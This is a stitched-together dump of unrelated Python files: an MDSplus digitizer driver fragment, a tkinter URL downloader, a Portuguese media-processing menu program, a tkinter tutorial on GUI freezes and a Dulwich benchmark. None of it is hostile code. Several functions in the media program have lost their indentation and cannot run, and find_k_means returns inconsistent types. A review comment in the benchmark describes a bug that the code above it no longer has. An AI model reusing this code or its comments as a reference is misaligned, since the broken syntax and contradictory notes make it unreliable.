        axis = MDSplus.Data.compile('BUILD_WITH_UNITS(BUILD_RANGE($1, $2, $3), "s")', self.TOFF.data(), nsam*DT, DT)
        for ic, ch in enumerate(self.chans):
            if ch.on:
                # De-interleave this channel via the channel map.
                ch.RAW.putData(channel_data[cmap[ic]::nchans]) # store raw for easy access
                ch.EOFF.putData(float(eoff[ic]))
                ch.ESLO.putData(float(eslo[ic]))
                ch.CAL.putData(MDSplus.Data.compile('BUILD_WITH_UNITS($3*$1+$2, "V")', ch.ESLO, ch.EOFF, ch.RAW)) # does this make a COPY of ch.RAW?
                # from mdsPutCh, recipe by B.Blackwell C(2007)
                win = MDSplus.Data.compile('BUILD_WINDOW(0, $1, BUILD_WITH_UNITS(0, "s"))', nsam)
                ch.TB.putData(MDSplus.Dimension(win, axis))
                ch.CAL_INPUT.putData(MDSplus.Data.compile('BUILD_SIGNAL($1, $2, $3)', ch.CAL, ch.RAW, ch.TB))
                ch.putData(ch.CAL_INPUT)
        # Notify waiters that the store for this UUT has completed.
        MDSplus.Event.setevent("{}st99".format(uutname))
        logging.debug("{}.{} complete".format("_ACQ400_M8_BASE", "store"))

    def store(self):
        ''' store: non-blocking for use with dispatcher '''
        print("{}.store()".format("_ACQ400_M8_BASE"))
        thread = threading.Thread(target = self._store)
        thread.start()
        return None
    STORE=store

    def storeb(self):
        ''' storeb: blocking store for use direct from TCL> '''
        # NOTE(review): this runs _store() synchronously; the original
        # docstring claimed "non-blocking".
        return self._store()
    STOREB=storeb
    pass
def int_key_chan(elem):
    """Sort key: the numeric third underscore-field of a generated class name
    (e.g. 'ACQ2106_TR_32' -> 32)."""
    fields = elem.split('_')
    return int(fields[2])
def print_generated_classes(class_dict):
    """List every generated class name (sorted by channel count), then dump
    the parts of the first one as a sample."""
    print("# public classes created in this module")
    first = None
    for name in sorted(class_dict, key=int_key_chan):
        if first is None:
            first = name
        print("# {}".format(name))
    print("{}".format(first))
    for part in class_dict[first].parts:
        print("{}".format(part))
# Format string for 3-digit input-channel node names (':INPUT_001' ...).
INPFMT3 = ':INPUT_%3.3d'
#INPFMT2 = ':INPUT_%2.2d'
# Channel counts for which concrete device classes are generated, per carrier.
ACQ2106_CHANNEL_CHOICES = [8, 16, 24, 32, 40, 48, 64, 80, 96, 128, 160, 192]
ACQ1001_CHANNEL_CHOICES = [8, 16, 24, 32, 40, 48, 64]
def assemble(cls):
    """Append the per-channel part dicts (:INPUT_001 ... :INPUT_nnn) to
    cls.parts and return cls.

    cls must provide `nchan` (channel count) and a mutable `parts` list.
    Ten parts are added per channel: the signal node plus RAW, CAL, TB,
    DECIMATE, COEFFICIENT, OFFSET, EOFF, ESLO and CAL_INPUT children.
    """
    # Always use the 3-digit format (INPUT_001 ...) — probably easier for
    # analysis code if the width never changes with channel count.
    inpfmt = ':INPUT_%3.3d'
    for ch in range(1, cls.nchan + 1):
        node = inpfmt % (ch,)
        cls.parts.append({'path': node, 'type': 'signal', 'options': ('no_write_model', 'write_once',)})
        cls.parts.append({'path': node + ':RAW', 'type': 'signal', 'options': ('no_write_model', 'write_once',)})
        cls.parts.append({'path': node + ':CAL', 'type': 'signal'})
        cls.parts.append({'path': node + ':TB', 'type': 'signal'})
        # BUG FIX: the options value was written as ('no_write_shot') — a
        # plain string, not a 1-tuple — on the next five parts; every other
        # part dict in this module uses a proper tuple.
        cls.parts.append({'path': node + ':DECIMATE', 'type': 'NUMERIC', 'value': 1, 'options': ('no_write_shot',)})
        cls.parts.append({'path': node + ':COEFFICIENT', 'type': 'NUMERIC', 'value': 1, 'options': ('no_write_shot',)})
        cls.parts.append({'path': node + ':OFFSET', 'type': 'NUMERIC', 'value': 1, 'options': ('no_write_shot',)})
        cls.parts.append({'path': node + ':EOFF', 'type': 'NUMERIC', 'value': 1, 'options': ('no_write_shot',)})
        cls.parts.append({'path': node + ':ESLO', 'type': 'NUMERIC', 'value': 1, 'options': ('no_write_shot',)})
        cls.parts.append({'path': node + ':CAL_INPUT', 'type': 'signal'})
    return cls
def create_classes(base_class, root_name, parts, channel_choices):
    """Build one concrete device class per channel count.

    Each generated class is named '<root_name>_<nchan>', derives from
    base_class, gets its own copy of `parts`, and has its per-channel
    nodes appended by assemble().
    """
    generated = {}
    for nchan in channel_choices:
        name = "{}_{}".format(root_name, str(nchan))
        klass = type(name, (base_class,), {"nchan": nchan, "parts": list(parts)})
        generated[name] = assemble(klass)
        # needed because of lockout in mdsplus code file
        # python/MDSplus/tree.py function findPyDevices
        generated[name].__module__ = base_class.__module__
    return generated
|
download_funcs.py | from threading import Thread
import urllib.request
import os
import tkinter as tk
from tkinter import messagebox
def get_content(path_var, url_entry_var):
    """Download the URL held in url_entry_var into the directory in path_var.

    The download runs on a background thread so the GUI stays responsive.
    Shows an error dialog and returns None when the URL does not start
    with 'http'. The saved file name is the last URL path component.
    """
    url = url_entry_var.get()
    path = path_var.get()
    file_name = url.strip().split("/")[-1]
    if not url.startswith("http"):
        messagebox.showerror(title="URL Error", message="URL is in wrong format!")
        return None
    # BUG FIX: the old code doubled every backslash on Windows before
    # concatenating paths by hand; os.path.join handles a present-or-absent
    # trailing separator and no escaping of a runtime string is needed.
    target = os.path.join(path, file_name) if path else file_name
    t = Thread(target=urllib.request.urlretrieve, args=(url, target))
    t.start()
def start_file_tasks(tasks):
    """Kick off every queued download thread in order."""
    for pending in tasks:
        pending.start()
def get_content_from_file(filen_var, path_var):
    """Queue a download for every http(s) URL listed in the named file.

    Reads at most max_lines lines; each URL line becomes a download thread
    and all threads are started together via start_file_tasks(). Non-URL
    lines are skipped. Shows an error dialog and returns None when the
    file is missing or has too many lines.
    """
    tasks = []
    file_name = filen_var.get()
    path = path_var.get()
    max_lines = 10
    try:
        with open(file_name) as content:
            lines = content.readlines()
        if len(lines) > max_lines:
            messagebox.showerror(title="Max Lines Error", message=f"Too many lines in {file_name}! Max is {max_lines}.")
            return None
        for raw in lines:
            # BUG FIX: the unstripped line (including its trailing '\n')
            # was previously passed to urlretrieve as the URL.
            url = raw.strip()
            if not url.startswith("http"):
                continue
            content_name = url.split("/")[-1]
            # BUG FIX: no more manual backslash doubling / separator checks;
            # os.path.join does the right thing on every platform.
            target = os.path.join(path, content_name) if path else content_name
            tasks.append(Thread(target=urllib.request.urlretrieve, args=(url, target)))
    except FileNotFoundError:
        messagebox.showerror(title="File Error", message=f"File {file_name} not found!")
        return None
    if tasks:
        start_file_tasks(tasks)
try:
    import sys
    import os, ffmpeg
    from PIL import Image
    from PIL import ImageEnhance
    from time import sleep
    from pydub import AudioSegment
    import math
    import numpy
    from threading import Thread
    import cv2
except ImportError as err:
    # BUG FIX: name the module that actually failed; the old message listed
    # libraries (pyfits, scipy, matplotlib) this file never imports.
    print("Error: missing one of the required libraries ({})".format(err))
    sys.exit()
def get_file_size_in_bytes(file_path):
    """Return the size, in bytes, of the file at file_path."""
    return os.path.getsize(file_path)
# -> Defenições de compressão de Imagem
# Cria pontos iniciais para os centróides.
def initialize_K_centroids(X, K):
    """Pick K distinct rows of X, uniformly at random, as initial centroids."""
    chosen = numpy.random.choice(len(X), K, replace=False)
    return X[chosen, :]
# Encontra o centróide mais próximo para cada exemplo de treino.
def find_closest_centroids(X, centroids):
m = len(X)
c = numpy.zeros(m)
for i in range(m):
# Find distances
distances = numpy.linalg.norm(X[i] - centroids, axis=1)
# Assign closest cluster to c[i]
c[i] = numpy.argmin(distances)
return c
# Calcula a distância de cada exemplo para o "seu" centróide e a média da sua distância para cada centróide
def compute_means(X, idx, K):
_, n = X.shape
centroids = numpy.zeros((K, n))
for k in range(K):
examples = X[numpy.where(idx == k)]
mean = [numpy.mean(column) for column in examples.T]
centroids[k] = mean
return centroids
# Aplicação do algoritmo K-means, retorna os resultados quando os centróides já não se mexerem.
def find_k_means(X, K, max_iters=10):
centroids = initialize_K_centroids(X, K)
previous_centroids = centroids
for _ in range(max_iters):
idx = find_closest_centroids(X, centroids)
centroids = compute_means(X, idx, K)
if (centroids == previous_centroids).all():
return centroids
else:
previous_centroids = centroids
return centroids, idx
# Como o algoritmo não recebe como parâmetro imagens, precisamos de converter a imagem dada num array.
def load_image(path):
## Devolve um numpy array com a imagem lida através do path
image = Image.open(path)
return numpy.asarray(image) / 255
# -> Fim das defenições de compressão de imagem
def imagemMultiplicacao(pathImagem1, pathImagem2):
    """Multiply two images pixel-by-pixel and save the clamped RGB result.

    Writes images/ImagemMultiplicacao.jpg. Assumes both images have the
    first image's size and mode — TODO confirm with callers.
    """
    # Open both source images.
    imagem1 = Image.open(pathImagem1)
    imagem2 = Image.open(pathImagem2)
    # Result image that will hold the product.
    imagemMult = Image.new(imagem1.mode, imagem1.size, 'white')
    imagemMult.save("images/ImagemMultiplicacao.jpg")
    # Walk every pixel. BUG FIX: the original used range(0, size-1) and
    # left the last row and column untouched (white).
    for x in range(imagem1.size[0]):
        for y in range(imagem1.size[1]):
            p1 = imagem1.getpixel((x, y))
            p2 = imagem2.getpixel((x, y))
            # Per-channel product, clamped to the 0..255 byte range
            # (the product of two bytes can reach 65025).
            redPixel = min(max(p1[0] * p2[0], 0), 255)
            greenPixel = min(max(p1[1] * p2[1], 0), 255)
            bluePixel = min(max(p1[2] * p2[2], 0), 255)
            imagemMult.putpixel((x, y), (redPixel, greenPixel, bluePixel))
    # Save the result and tell the user where to find it.
    imagemMult.save('images/ImagemMultiplicacao.jpg')
    print('Multiplicação de imagens realizada com sucesso --> Verificar ImagemMultiplicação.jpg')
    sleep(4)
def imagemSubtracao(pathImagem1, pathImagem2):
    """Subtract image 2 from image 1 pixel-by-pixel (clamped at 0) and save
    the result as images/ImagemSubt.jpg."""
    # Open both source images.
    imagem1 = Image.open(pathImagem1)
    imagem2 = Image.open(pathImagem2)
    # Result image that will hold the difference.
    imagemSoma = Image.new(imagem1.mode, imagem1.size, 'white')
    imagemSoma.save("images/ImagemSubt.jpg")
    # Walk every pixel. BUG FIXES: (1) the original used range(0, size-1)
    # and skipped the last row/column; (2) the green-underflow branch
    # zeroed redPixel instead of greenPixel.
    for x in range(imagem1.size[0]):
        for y in range(imagem1.size[1]):
            p1 = imagem1.getpixel((x, y))
            p2 = imagem2.getpixel((x, y))
            # Per-channel difference, clamped at 0.
            redPixel = max(p1[0] - p2[0], 0)
            greenPixel = max(p1[1] - p2[1], 0)
            bluePixel = max(p1[2] - p2[2], 0)
            imagemSoma.putpixel((x, y), (redPixel, greenPixel, bluePixel))
    # Save the result and tell the user where to find it.
    imagemSoma.save('images/ImagemSubt.jpg')
    print('Subtração de imagens realizada com sucesso --> Verificar ImagemSubt.jpg')
    sleep(4)
def imagemNegativo(pathImagem1):
    """Invert an image's RGB channels and save images/ImagemNegativo.jpg."""
    # Open the source image.
    imagem1 = Image.open(pathImagem1)
    # Result image that will hold the negative.
    imagem_negativo = Image.new(imagem1.mode, imagem1.size, 'white')
    imagem_negativo.save("images/ImagemNegativo.jpg")
    # Walk every pixel. BUG FIX: the original used range(0, size-1) and
    # left the last row and column white.
    for x in range(imagem1.size[0]):
        for y in range(imagem1.size[1]):
            pixelColorVals = imagem1.getpixel((x, y))
            # Invert each channel: negative = 255 - value.
            redPixel = 255 - pixelColorVals[0]
            greenPixel = 255 - pixelColorVals[1]
            bluePixel = 255 - pixelColorVals[2]
            imagem_negativo.putpixel((x, y), (redPixel, greenPixel, bluePixel))
    # Save the result and tell the user where to find it.
    imagem_negativo.save("images/ImagemNegativo.jpg")
    print('Negativo de uma imagem realizado com sucesso --> Verificar ImagemNegativo.jpg')
    sleep(4)
def imagemAND(pathImagem1, pathImagem2):
    """Keep only the pixels on which both images agree exactly.

    Matching pixels are copied; everything else stays white (the background
    of the freshly created result). Saves images/ImagemAND.jpg.
    """
    # Open both source images.
    imagem1 = Image.open(pathImagem1)
    imagem2 = Image.open(pathImagem2)
    # Result image; non-matching pixels keep this white background.
    imagem_and = Image.new(imagem1.mode, imagem1.size, 'white')
    imagem_and.save("images/ImagemAND.jpg")
    # Walk every pixel. BUG FIX: the original used range(0, size-1) and
    # never examined the last row or column.
    for x in range(imagem1.size[0]):
        for y in range(imagem1.size[1]):
            pixelImg1 = imagem1.getpixel((x, y))
            pixelImg2 = imagem2.getpixel((x, y))
            # Intersection: copy the pixel only when all channels match.
            if (pixelImg1[0] == pixelImg2[0]
                    and pixelImg1[1] == pixelImg2[1]
                    and pixelImg1[2] == pixelImg2[2]):
                imagem_and.putpixel((x, y), (pixelImg1[0], pixelImg1[1], pixelImg1[2]))
    # Save the result and tell the user where to find it.
    imagem_and.save("images/ImagemAND.jpg")
    print('AND de uma imagem realizado com sucesso --> Verificar ImagemAND.jpg')
    sleep(4)
def imagemThreshold(pathImagem):
    """Binarise an image and save it as images/ImagemThreshold.jpg.

    Pixels whose RED channel exceeds 127 become white, all others black.
    NOTE(review): only the red channel drives the decision — confirm this
    is intended rather than a luminance threshold.
    """
    # Open the source image.
    imagem = Image.open(pathImagem)
    # Result image that will hold the binarised output.
    imagemThreshold = Image.new(imagem.mode, imagem.size, 'white')
    imagemThreshold.save("images/ImagemThreshold.jpg")
    # Walk every pixel. BUG FIX: the original used range(0, size-1) and
    # left the last row and column white.
    for x in range(imagem.size[0]):
        for y in range(imagem.size[1]):
            pixelColorsValsImagem = imagem.getpixel((x, y))
            if pixelColorsValsImagem[0] > 127:
                novo = (255, 255, 255)
            else:
                novo = (0, 0, 0)
            imagemThreshold.putpixel((x, y), novo)
    # Save the result and tell the user where to find it.
    imagemThreshold.save('images/ImagemThreshold.jpg')
    print('Threshold da imagem realizado com sucesso --> Verificar ImagemThreshold.jpg')
    sleep(4)
def imagemPretoBranco(pathimagem1):
    """Convert an image to grayscale with fixed luma weights and save it as
    images/ImagemPretoBranco.jpg."""
    # Open the source image and iterate its flattened pixel data.
    image = Image.open(pathimagem1)
    # Weighted R/G/B sum per pixel (weights close to Rec. 709 luma
    # coefficients — kept exactly as the original constants).
    gray_values = [
        px[0] * 0.2125 + px[1] * 0.7174 + px[2] * 0.0721
        for px in image.getdata()
    ]
    # Build a single-band ("L") image of the same size and fill it.
    new_img = Image.new("L", image.size)
    new_img.putdata(gray_values)
    # Save the result and tell the user where to find it.
    new_img.save("images/ImagemPretoBranco.jpg")
    print('Preto e branco da imagem realizado com sucesso --> Verificar ImagemPretoBranco.jpg')
    sleep(4)
def audioCortar(pathAudio):
    """Split the WAV file `pathAudio` (inside the 'sound' folder) into
    1-minute chunks saved alongside it, named '<minute>_<filename>'."""
    # Helper class wrapping pydub's AudioSegment for splitting.
    class SplitWavAudio():
        def __init__(self, folder, filename):
            self.folder = folder
            self.filename = filename
            self.filepath = folder + '/' + filename
            self.audio = AudioSegment.from_wav(self.filepath)

        # Return the duration in seconds.
        def get_duration(self):
            return self.audio.duration_seconds

        # Cut the audio over the given interval (minutes) and export it.
        def single_split(self, from_min, to_min, split_filename):
            # pydub slices in milliseconds.
            t1 = from_min * 60 * 1000
            t2 = to_min * 60 * 1000
            split_audio = self.audio[t1:t2]
            split_audio.export(self.folder + '/' + split_filename , format = "wav")

        # Split the audio into several files of min_per_split minutes each.
        def multiple_split(self, min_per_split):
            total_mins = math.ceil(self.get_duration() / 60)
            for i in range(0, total_mins, min_per_split):
                split_fn = str(i) + '_' + self.filename
                self.single_split(i, i + min_per_split, split_fn)
                print(str(i) + 'Done')
                if i == total_mins - min_per_split:
                    print('All splited successfully')

    folder = 'sound'
    file = pathAudio
    split_wav = SplitWavAudio(folder, file)
    split_wav.multiple_split(min_per_split=1)
    print("Som separado com sucesso, verificar parte 0/1/2/3/4/5 do sound2.wav")
    sleep(4)
# Acrescenta um áudio ao final do outro através do '+'
def audioJuntar(pathAudio1, pathAudio2):
    """Concatenate two WAV files (pydub's '+' appends segments) and save
    the result as sound/soundJOUTPUT.wav."""
    primeiro = AudioSegment.from_wav(pathAudio1)
    segundo = AudioSegment.from_wav(pathAudio2)
    combinado = primeiro + segundo
    combinado.export("sound/soundJOUTPUT.wav", format="wav")
    print("Sons somados com sucesso, verificar soundJOUTPUT.wav")
    sleep(3)
def audioLowPassFilter(pathAudio):
    """Apply a 2 kHz low-pass filter to a WAV file and save the result as
    sound/sound2LowPassFilter.wav."""
    # Read the sound from the given path.
    song = AudioSegment.from_wav(pathAudio)
    # New sound with frequencies above 2000 Hz attenuated.
    new = song.low_pass_filter(2000)
    # Save the filtered sound.
    new.export("sound/sound2LowPassFilter.wav", format="wav")
    # BUG FIX: corrected the typo "FIlter" in the user-facing message.
    print("Low Pass Filter aplicado com sucesso, verificar sound2LowPassFilter.wav")
    sleep(3)
def audioAcelerar(pathAudio, speed):
    """Speed a WAV file up by `speed`x and save it as sound/sound2Acelerado.wav."""
    # Read the sound from the given path.
    sound = AudioSegment.from_wav(pathAudio)
    # Re-spawn the same raw data with a frame rate `speed` times higher,
    # which makes playback that much faster.
    sound_with_altered_frame_rate = sound._spawn(sound.raw_data, overrides={"frame_rate": int(sound.frame_rate * speed)})
    # NOTE(review): set_frame_rate returns a NEW segment and the result is
    # discarded here, so this statement has no effect — confirm the intent
    # before "fixing" it, since the exported file relies on the altered rate.
    sound_with_altered_frame_rate.set_frame_rate(sound.frame_rate)
    # Save the newly created sound.
    sound_with_altered_frame_rate.export("sound/sound2Acelerado.wav", format="wav")
    print("Som acelerado com sucesso, verificar sound2Acelerado.wav")
    sleep(3)
def videoPretoBranco(videopath):
    """Play the video at `videopath` converted to grayscale, frame by frame,
    until the stream ends or the user presses 'q'."""
    source = cv2.VideoCapture(videopath)
    while True:
        # Grab the next frame.
        ret, frame = source.read()
        # Stop when no frame could be read (end of stream or error).
        if not ret:
            print("Can't receive frame (stream end?). Exiting ...")
            break
        # Convert the frame to grayscale.
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        # Display the converted frame.
        cv2.imshow("Live", gray)
        # Leave the loop when 'q' is pressed.
        key = cv2.waitKey(1)
        if key == ord("q"):
            break
    # Close the window and release the capture device.
    cv2.destroyAllWindows()
    source.release()
# Outra Função de Vídeo a Preto e branco - Não usada pois não estava a funcionar bem
class VideoToGrayscaleWidget(object):
    """Threaded grayscale video recorder (kept for reference; the author's
    note above says it was not working well and it is unused)."""
    def __init__(self, src=0):
        # Create the video-capture object.
        self.capture = cv2.VideoCapture(src)
        # Frame resolution from capture properties 3/4 (width/height).
        self.frame_width = int(self.capture.get(3))
        self.frame_height = int(self.capture.get(4))
        # Codec and output writer for the recorded (grayscale) video.
        self.codec = cv2.VideoWriter_fourcc('X','V','I','D')
        self.output_video = cv2.VideoWriter('videos/videoPretoBranco.mp4', self.codec, 30, (self.frame_width, self.frame_height), isColor=False)
        # Background daemon thread that keeps reading frames from the stream.
        self.thread = Thread(target=self.update, args=())
        self.thread.daemon = True
        self.thread.start()

    def update(self):
        # Continuously read the next frame on the background thread;
        # the latest frame/status are published via instance attributes.
        while True:
            if self.capture.isOpened():
                (self.status, self.frame) = self.capture.read()

    def show_frame(self):
        # Convert the most recent frame to grayscale and display it.
        if self.status:
            self.gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY)
            cv2.imshow('grayscale frame', self.gray)

        # Press 'q' on keyboard to stop recording
        key = cv2.waitKey(1)
        if key == ord('q'):
            self.capture.release()
            self.output_video.release()
            cv2.destroyAllWindows()
            exit(1)

    def save_frame(self):
        # Append the current grayscale frame to the output file.
        self.output_video.write(self.gray)
def comprimeVideo(video_full_path, output_file_name, target_size):
    """Two-pass ffmpeg compression of a video down to roughly ``target_size``.

    video_full_path  -- path of the video we want to compress
    output_file_name -- file name for the compressed result
    target_size      -- desired compressed size (multiplied by 1024*8 to get
                        a bit budget, as in the original formula)

    Raises ValueError if the input has no audio stream.
    """
    tamanhoVideo = get_file_size_in_bytes(video_full_path)
    # Reference: https://en.wikipedia.org/wiki/Bit_rate#Encoding_bit_rate
    min_audio_bitrate = 32000
    max_audio_bitrate = 256000

    probe = ffmpeg.probe(video_full_path)
    # Video duration, in seconds
    duration = float(probe['format']['duration'])
    # BUG FIX: the original dereferenced next(..., None) unconditionally and
    # crashed with TypeError on videos without an audio stream; fail with a
    # clear message instead.
    audio_stream = next((s for s in probe['streams'] if s['codec_type'] == 'audio'), None)
    if audio_stream is None:
        raise ValueError("comprimeVideo: input video has no audio stream")
    # Audio bitrate, in bps
    audio_bitrate = float(audio_stream['bit_rate'])
    # Total target bitrate, in bps
    target_total_bitrate = (target_size * 1024 * 8) / (1.073741824 * duration)

    # Target audio bitrate, in bps: keep audio at most 1/10 of the budget,
    # clamped into [min_audio_bitrate, max_audio_bitrate]
    if 10 * audio_bitrate > target_total_bitrate:
        audio_bitrate = target_total_bitrate / 10
        if audio_bitrate < min_audio_bitrate < target_total_bitrate:
            audio_bitrate = min_audio_bitrate
        elif audio_bitrate > max_audio_bitrate:
            audio_bitrate = max_audio_bitrate
    # Target video bitrate, in bps
    video_bitrate = target_total_bitrate - audio_bitrate

    i = ffmpeg.input(video_full_path)
    # Two-pass encode: the first pass gathers statistics (output discarded),
    # the second pass writes the compressed file.
    ffmpeg.output(i, os.devnull, **{'c:v': 'libx264', 'b:v': video_bitrate, 'pass': 1, 'f': 'mp4'}).overwrite_output().run()
    ffmpeg.output(i, output_file_name, **{'c:v': 'libx264', 'b:v': video_bitrate, 'pass': 2, 'c:a': 'aac', 'b:a': audio_bitrate}).overwrite_output().run()
    print("Video comprimido com sucesso, verificar videoComprimido.mp4")
    ## Show the initial and final size of the video and the compression ratio
    tamanhoVideoComp = get_file_size_in_bytes(output_file_name)
    razao = tamanhoVideo / tamanhoVideoComp
    print("Tamanho do vídeo original: {0}KB\nTamanho do vídeo comprimido: {1}KB\nTaxa de compressão: {2}".format(tamanhoVideo, tamanhoVideoComp, razao))
    sleep(7)
# Top-level menu: media-category selection.
menuPrincipalOptions = {
    1: 'Imagens',
    2: 'Áudio',
    3: 'Vídeo',
    4: 'Compressão',
    5: 'Sair'
}
# Image submenu.
menuImagensOptions = {
    1: 'Operações Aritméticas',
    2: 'Operações Lógicas',
    3: 'Filtros',
    4: 'Sair',
}
# Audio submenu.
menuAudioOptions = {
    1: 'Edição',
    2: 'Filtros',
    3: 'Sair',
}
# Compression submenu.
menuCompressaoOptions = {
    1: 'Compressão de imagem',
    2: 'Compressão de vídeo',
    3: 'Sair',
}
# Image arithmetic-operations submenu.
menuOperacoesAritmeticas = {
    1: 'Multiplicação de imagens',
    2: 'Subtração de imagens',
    3: 'Sair',
}
# Image logical-operations submenu.
menuOperacoesLogicas = {
    1: 'Negativo',
    2: 'AND',
    3: 'Sair',
}
# Image filtering submenu.
menuFiltragem = {
    1: 'Threshold',
    2: 'Preto e Branco',
    3: 'Sair',
}
# Audio editing submenu.
menuAudioEdicao = {
    1: 'Cortar áudio',
    2: 'Juntar áudio',
    3: 'Sair',
}
# Audio filters submenu.
menuAudioFiltros = {
    1: 'Low Pass Filter (Demora cerca de 15sec a ser aplicado)',
    2: 'Acelerar áudio',
    3: 'Sair',
}
def print_menuPrincipal():
print('-> Menu Principal\n ')
for key in menuPrincipalOptions.keys():
print (key, '->', menuPrincipalOptions[key] )
def print_menuImagens():
print('-> Menu Imagens\n ')
for key in menuImagensOptions.keys():
print (key, '->', menuImagensOptions[key] )
def print_menuAudio():
print('-> Menu Áudio\n ')
for key in menuAudioOptions.keys():
print (key, '->', menuAudioOptions[key] )
def print_menuCompressao():
print('-> Menu Compressão\n ')
for key in menuCompressaoOptions.keys():
print (key, '->', menuCompressaoOptions[key] )
def print_menuOperacoesAritmeticas():
print('-> Menu Operações Aritméticas\n ')
for key in menuOperacoesAritmeticas.keys():
print (key, '->', menuOperacoesAritmeticas[key] )
def print_menuOperacoesLogicas():
print('-> Menu Operações Lógicas\n ')
for key in menuOperacoesLogicas.keys():
print (key, '->', menuOperacoesLogicas[key] )
def print_menuFiltragem():
print('-> Menu Filtragem\n ')
for key in menuFiltragem.keys():
print (key, '->', menuFiltragem[key] )
def print_menuAudioEdicao():
print('-> Menu Edição de Áudio\n ')
for key in menuAudioEdicao.keys():
print (key, '->', menuAudioEdicao[key] )
def print_menuAudioFiltros():
print('-> Menu Filtros de Áudio\n ')
for key in menuAudioFiltros.keys():
print (key, '->', menuAudioFiltros[key] )
def clearConsole():
    """Clear the terminal, using the right command for the current OS."""
    # Windows-style consoles ('nt'/'dos') use 'cls'; everything else 'clear'.
    if os.name in ('nt', 'dos'):
        os.system('cls')
    else:
        os.system('clear')
|
preventfreeze.py | """
Reference:
Why your GUI app freezes
http://stupidpythonideas.blogspot.com/2013/10/why-your-gui-app-freezes.html
"""
import tkinter as tk
import time
"""
Imagine a simple Tkapp.
(Everything is pretty much the same for most other GUI frameworks, and many frameworks for games and network servers,
and even things like SAX parsers, but most novices first run into this with GUI apps,
and Tkinter is easy to explore because it comes with Python.)
"""
"""
def handle_click():
print("Clicked")
root = tk.Tk()
tk.Button(root, text="Click me", command=handle_click).pack()
root.mainloop()
"""
"""
Now Imagine that, instead of just printing a message, you want it to pop
up a window, wait 5 seconds, then close the window. You might try to write this:
root = tk.Tk()
def handle_click():
win = tk.Toplevel(root)
win.transient()
tk.Label(win, text="Please wait...").pack()
for i in range(5, 0, -1):
print(i)
time.sleep(1)
win.destroy()
tk.Button(root, text="Click me", command=handle_click).pack()
root.mainloop()
But when you click the button, the window does not show up.
And the main window freezes up and beachballs for 5 seconds.
This is because your event handler has not returned, so the main loop cannot process any events.
It needs to process events to display a new window,
respond to messages from the OS, etc., and you are not letting it.
"""
"""
There are two basic ways around this problem: callbacks, or threads.
There are advantages and disadvantages of both. And then there are various
ways of building thread-like functionality on top of callbacks, which let you
get (part of) the best of both worlds, but I will get to those in another post
(http://stupidpythonideas.blogspot.com/2013/10/solving-callbacks-for-python-guis.html)
"""
"""
Your event handler has to return in a fraction of a second.
But what if you still have code to run? You have to
reorganize your code: Do some setup,
then schedule the rest of the code to run later.
And that "rest of the code" is also an event handler,
so it also has to return in a fraction of a second,
which means often it will have to do a bit of work and again
schedule the rest to run later.
Depending on what you're trying to do, you may want to run on a timer,
or whenever the event loop is idle,
or every time through the event loop no matter what.
In this case, we want to run once/second.
In Tkinter, you do this with the after method:
root = tk.Tk()
def handle_click():
win = tk.Toplevel(root)
win.transient()
tk.Label(win, text='Please wait...').pack()
i = 5
def callback():
nonlocal i, win
print(i)
i -= 1
if not i:
win.destroy()
else:
root.after(1000, callback)
root.after(1000, callback)
tk.Button(root, text="Click me", command=handle_click).pack()
root.mainloop()
"""
"""
For a different example, imagine we just have some processing that takes a few
seconds because it has so much work to do.
We will do something stupid and simple
def handle_click():
tot = sum(range(100000))
label.config(text=tot)
root = tk.Tk()
tk.Button(root, text='add it up', command=handle_click).pack()
label = tk.Label(root)
label.pack()
root.mainloop()
When you click the button, the whole app will freeze up for a few seconds
as Python calculates that sum. So, what we want to do is break it up into chunks:
def handle_click():
total = 0
i = 0
def callback():
nonlocal i, total
total += sum(range(i * 100000, (i + 1) * 100000))
i += 1
if i == 100:
label.config(text=total)
else:
root.after_idle(callback)
root.after_idle(callback)
root = tk.Tk()
tk.Button(root, text='add it up', command=handle_click).pack()
label = tk.Label(root)
label.pack()
root.mainloop()
While callbacks definitely work, there are a lot of problems with them.
First, we have turned our control flow inside-out. Compare the simple for loop
to the chain of callbacks that replaced it. And it gets much worse when you have more complicated code.
On top of that, it's very easy to get lost in a callback chain. If you forget to schedule the next callback,
the operation never finishes.
"""
"""
Another option is a hybrid approach:
Do your GUI stuff in the main thread,
and your I/O in a second thread.
Both of them can still be callback-driven,
and you can localize all of the threading problems
to the handful of places where the two have to
interact with each other.
"""
"""
Threading:
with multithreading, we do not have to reorganize our code at all, we just move
all of the work onto a thread:
import threading
def handle_click():
def callback():
total = sum(range(100000000))
print(total)
t = threading.Thread(target=callback)
t.start()
root = tk.Tk()
tk.Button(root, text='clickme', command=handle_click).pack()
root.mainloop()
"""
import threading

def handle_click():
    """Run the heavy sum on a worker thread, then update the label."""
    def callback():
        total = sum(range(100000000))
        # BUG FIX: tk.Tk has no `on_main_thread` method.  Tkinter widgets must
        # only be touched from the main thread; `root.after(0, ...)` schedules
        # the label update on the main loop, which is the supported way.
        root.after(0, lambda: label.config(text=total))
    t = threading.Thread(target=callback)
    t.start()

root = tk.Tk()
tk.Button(root, text='clickme', command=handle_click).pack()
# BUG FIX: `label` was referenced by the callback but never created
# (the original script would raise NameError on click); create it as in the
# worked examples above.
label = tk.Label(root)
label.pack()
root.mainloop()
|
bm_dulwich_log.py | """
Iterate on commits of the asyncio Git repository using the Dulwich module.
"""
import os
from mpkmemalloc import *
import os
import gc
import threading
import psutil
import pyperf
import dulwich.repo
def iter_all_commits(repo):
    """Iterate over every commit reachable from the repository's HEAD."""
    # BUG FIX: the original walked `repo.get_walker(head)`, but `head` is only
    # a *local* variable inside functionWorker, so this raised NameError when
    # the benchmark ran.  Resolve HEAD from the repo itself instead.
    # iterate on all changes on the Git repository
    for entry in repo.get_walker(repo.head()):
        pass
# if __name__ == "__main__":
def functionWorker(tname, allocate_pkey):
    """Run the Dulwich commit-walk benchmark once in this worker thread.

    tname         -- thread name, used as the label for the MPK protection key
    allocate_pkey -- truthy to bind this thread to its own protection key via
                     pkey_thread_mapper (from mpkmemalloc)
    """
    if allocate_pkey:
        pkey_thread_mapper(tname)
    # One pyperf iteration: walk every commit of the bundled asyncio repo.
    runner = pyperf.Runner(loops=1)
    runner.metadata['description'] = ("Dulwich benchmark: "
                                      "iterate on all Git commits")
    repo_path = os.path.join(os.path.dirname(__file__), 'data', 'asyncio.git')
    repo = dulwich.repo.Repo(repo_path)
    # NOTE(review): `head` is a local here, but iter_all_commits reads a
    # global `head` — confirm the benchmark actually resolves HEAD as intended.
    head = repo.head()
    runner.bench_func('dulwich_log', iter_all_commits, repo)
    repo.close()
